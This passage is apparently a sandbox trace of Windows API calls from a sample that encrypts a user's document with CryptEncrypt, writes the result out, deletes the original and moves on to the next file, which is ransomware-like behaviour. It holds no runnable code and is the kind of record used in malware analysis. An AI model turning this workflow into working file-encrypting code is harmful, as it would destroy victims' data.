out: lpsz="bool") returned 0x4 [0079.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb108, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.995] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x13b7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x13c0) returned 1 [0079.995] CharLowerBuffW (in: lpsz="byte[5057]", cchLength=0xa | out: lpsz="byte[5057]") returned 0xa [0079.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.995] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499db48*, pdwDataLen=0x144e2e0*=0x13b7, dwBufLen=0x13c0 | out: pbData=0x499db48*, pdwDataLen=0x144e2e0*=0x13c0) returned 1 [0079.995] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.995] WriteFile (in: hFile=0x258, lpBuffer=0x499b3d0*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x499b3d0*, lpNumberOfBytesWritten=0x144ece4*=0x13c0, lpOverlapped=0x0) returned 1 [0079.996] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.996] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cadd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.997] CryptDestroyKey (hKey=0x41ac000) returned 1 [0079.997] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.997] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.997] CryptReleaseContext (hProv=0x41a5030, dwFlags=0x0) returned 1 [0079.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.997] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.997] CloseHandle (hObject=0x298) returned 1 [0079.998] CloseHandle (hObject=0x258) returned 1 [0079.999] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp", lpFilePart=0x0) returned 0x35 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0079.999] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\jziop.odp")) returned 0x20 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e400 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0079.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0079.999] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f95ae0, ftCreationTime.dwHighDateTime=0x1d5e9f1, ftLastAccessTime.dwLowDateTime=0xb1d65d40, ftLastAccessTime.dwHighDateTime=0x1d5e7cf, ftLastWriteTime.dwLowDateTime=0xb1d65d40, ftLastWriteTime.dwHighDateTime=0x1d5e7cf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="JzioP.odp", cAlternateFileName="")) returned 0x41ac640 [0079.999] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\jziop.odp")) returned 1 [0080.020] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f95ae0, ftCreationTime.dwHighDateTime=0x1d5e9f1, ftLastAccessTime.dwLowDateTime=0xb1d65d40, ftLastAccessTime.dwHighDateTime=0x1d5e7cf, ftLastWriteTime.dwLowDateTime=0xb1d65d40, ftLastWriteTime.dwHighDateTime=0x1d5e7cf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="JzioP.odp", cAlternateFileName="")) returned 0 [0080.020] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0080.020] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0080.020] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0080.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.021] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.021] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.021] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0080.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0080.022] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.022] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0080.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.022] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d566e80, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0x1927e6d0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0x1927e6d0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0xbca0, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="lTD44h.ots", cAlternateFileName="")) returned 0x41ac6c0 [0080.023] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0080.023] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0080.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0080.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0080.024] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0080.024] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0080.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0080.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0080.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0080.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0080.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0080.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0080.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0080.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0080.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, 